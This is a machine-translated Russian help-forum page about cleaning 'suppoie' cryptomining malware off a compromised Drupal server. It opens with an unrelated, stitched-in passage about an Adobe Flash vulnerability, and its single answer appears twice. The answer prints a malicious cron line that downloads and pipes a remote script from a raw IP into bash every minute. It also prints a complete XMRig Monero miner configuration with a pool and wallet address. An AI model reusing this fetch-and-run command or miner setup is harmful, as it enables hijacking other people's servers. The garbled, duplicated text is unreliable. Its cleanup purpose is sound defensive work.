удаление вредоносного ПО suppoie (скрипт, скрытый в .jpg)
Чтобы быть понятным, Adobe абсолютно исправляет уязвимости безопасности в версиях Flash Firefox 11.2.202.x. Они просто прекратили выпуск новых функций. Версия для Linux от Linux делает это.
Итак, вот отрывок из APSA16-01, экстренная консультация по безопасности Flash с апреля:
Существует критическая уязвимость (CVE-2016-1019) в Adobe Flash Player 21.0.0.197 и более ранних версиях для Windows, Macintosh, Linux и Chrome OS. Успешная эксплуатация может привести к сбою и потенциально позволить злоумышленнику взять под контроль затронутую систему. Adobe знает о том, что CVE-2016-1019 активно используется в системах под управлением Windows 10 и более ранних версий с Flash Player версии 20.0.0.306 и ранее. Предотвращение использования этой уязвимости в Flash Player 21.0.0.182 в настоящее время предотвращает использование этой уязвимости, защищая пользователей, запускающих Flash Player 21.0.0.182 и более поздних версий.Я не знаю точно, но это подразумевает, что смягчение кучи, введенное в 21.0.0.182, не было обращено к версии Firefox Linux 11.2.202.577 в то время. Теперь возможно, что эксплойт может быть улучшен для атаки 21.0.0.182, несмотря на смягчение, и, вероятно, никто не беспокоился об использовании Linux вообще, но похоже, что серия Chrome 21.0.0.x является более сложной задачей.
Лично, Firefox - мой обычный «ежедневный драйвер», но я запускаю Chrome, когда мне нужно запустить Flash.
4 ответа
В вашем www-data cron:
sudo crontab -e -u www-data
Вы увидите что-то вроде:
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
Убейте процесс, затем очистите его из / var / TMP
Я предполагаю, что это вредоносная программа для биткойнов, кто-то обнаружил нарушение безопасности drupal и поставил этот скрипт на моем сервере.
В моем случае он находится в / var / spool / cron / crontabs /, также скручивайте что-то вроде
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
, а скрипт находится в /var/tmp/config.json и suppoie, который выглядит так:
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
{
"url": "stratum+tcp://monerohash.com:5555", // URL of mining server
"user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
Удаляет строку в crontabs и очищенном / var / tmp /, кажется, работает
В вашем www-data cron:
sudo crontab -e -u www-data
Вы увидите что-то вроде:
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
Убейте процесс, затем очистите его из / var / TMP
Я предполагаю, что это вредоносная программа для биткойнов, кто-то обнаружил нарушение безопасности drupal и поставил этот скрипт на моем сервере.
В моем случае он находится в / var / spool / cron / crontabs /, также скручивайте что-то вроде
* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s
, а скрипт находится в /var/tmp/config.json и suppoie, который выглядит так:
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
{
"url": "stratum+tcp://monerohash.com:5555", // URL of mining server
"user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
Удаляет строку в crontabs и очищенном / var / tmp /, кажется, работает